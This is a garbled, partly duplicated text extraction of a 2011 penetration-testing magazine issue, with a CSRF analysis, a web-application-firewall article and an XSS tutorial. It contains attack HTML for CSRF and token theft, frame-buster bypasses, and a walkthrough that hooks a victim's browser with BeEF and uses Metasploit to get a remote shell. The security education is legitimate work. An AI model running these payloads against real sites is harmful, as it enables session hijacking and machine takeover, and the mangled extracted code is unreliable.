Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
